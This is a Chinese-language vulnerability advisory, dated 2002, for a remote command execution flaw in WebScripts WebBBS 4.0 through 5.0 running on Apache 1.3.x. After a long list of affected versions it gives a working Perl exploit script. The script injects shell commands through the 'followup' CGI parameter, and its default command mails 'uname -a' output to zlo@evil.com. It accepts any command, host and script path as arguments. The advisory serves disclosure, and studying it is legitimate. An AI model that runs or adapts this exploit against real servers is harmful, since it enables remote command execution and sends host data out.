|
|
WebScripts WebBBS远程命令执行漏洞
发布时间:2002-06-21
更新时间:2002-06-21
严重程度:高
威胁程度:普通用户访问权限
错误类型:输入验证错误
利用方式:服务器模式
BUGTRAQ ID:5048
受影响系统WebScripts WebBBS 4.0
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.1
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.2
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.10
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.11
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.12
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.20
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.21
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.22
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.30
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.31
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.32
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 4.33
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25
WebScripts WebBBS 5.0
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.25 详细描述
WebBBS没有充分过滤CGI参数中的SHELL元字符,攻击者可以提供特殊字符而以WEB权限执行任意命令。
测试代码
#!/usr/bin/perl
#
# nerF gr0up
#
# exploit code for
# WebBBS by Darryl C. Burgdorf
# all version up to 5.00 are vulnerable
#
#
# this is an exploitation of "followup" bug.
# it allows remote attacker to execute shell
commands.
# you can find WebBBS script at
http://awsd.com/scripts/webbbs/
#
# 06.06.2002
# btr // nerf
# nerf.ru
use IO::Socket;
srand();
$script = "/cgi-bin/webbbs/webbbs_config.pl";
$command = "uname -a|mail zlo@evil.com";
$host = "localhost";
$port = 80;
$content = "$content" . "name=" . rand(254);
$content = "$content" . "&email=" . rand(254);
$content = "$content" . "&subject=" .
rand(254);
$content = "$content" . "&body=" . rand(254);
$content="$content"."&followup=".rand(254)."|$command|";
$content_length = length($content);
$content_type =
"application/x-www-form-urlencoded";
if (@ARGV[0]) {$command=@ARGV[0];}
if (@ARGV[1]) {$host=@ARGV[1];}
if (@ARGV[2]) {$script=@ARGV[2];}
$buf = "POST " . "$script" . "?post
HTTP/1.0\n";
$buf = "$buf" . "Content-Type:
$content_type\r\nContent-Length:";
$buf = "$buf" .
"$content_length\r\n\r\n$content", 0;
print "\tnerF gr0up\n";
print "exploit: WebBBS (awsd.com), version up
to 5.00\n";
print "sent:\n$buf\n";
if($socket = IO::Socket::INET->new("$host:$port")){
print $socket "$buf";
read($socket,$buf,1500);
print "recieved:\n$buf\n";
}
解决方案
无
相关信息
nerf gr0up nerf <vipersv@mail.ru>.
参考:http://online.securityfocus.com/archive/1/277517
相关主页:http://awsd.com/scripts/webbbs/
|
